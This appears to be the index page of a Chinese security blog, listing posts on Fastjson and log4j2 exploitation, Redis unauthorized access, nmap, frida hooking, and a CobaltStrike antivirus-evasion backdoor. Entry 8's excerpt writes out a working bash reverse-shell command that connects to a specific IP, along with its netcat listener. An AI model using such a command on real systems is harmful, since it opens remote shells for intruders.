1. Fastjson 远程命令执行进阶

    环境构建

    2022/03/01 安全漏洞

  2. log4j2-进阶利用

    ##

    2022/03/01 安全漏洞

  3. Redis 未授权访问漏洞复现

    前言

    2022/03/01 安全漏洞

  4. 排版格式-参考

    https://github.com/mzlogin/chinese-copywriting-guidelines

    2022/02/22 排版

  5. nmap 端口扫描

    起因

    2022/02/22 安全工具

  6. frida 入门及几种 hook 思路

    0x01 简介

    2022/02/22 安全工具

  7. 一次简单的数据泄露排查

    起因

    2022/02/22 安全

  8. 反弹shell

    执行反弹 shell 我们就以最常见的bash为例: attacker机器上执行: nc -lvvnp 2333 victim 机器上执行: bash -i >& /dev/tcp/101.33.66.29/2333 0>&1 https://xz.aliyun.com/t/2549

    2022/02/20 安全工具

  9. CobaltStrike简易免杀后门制作

    一、相关工具地址

    2022/02/20 安全工具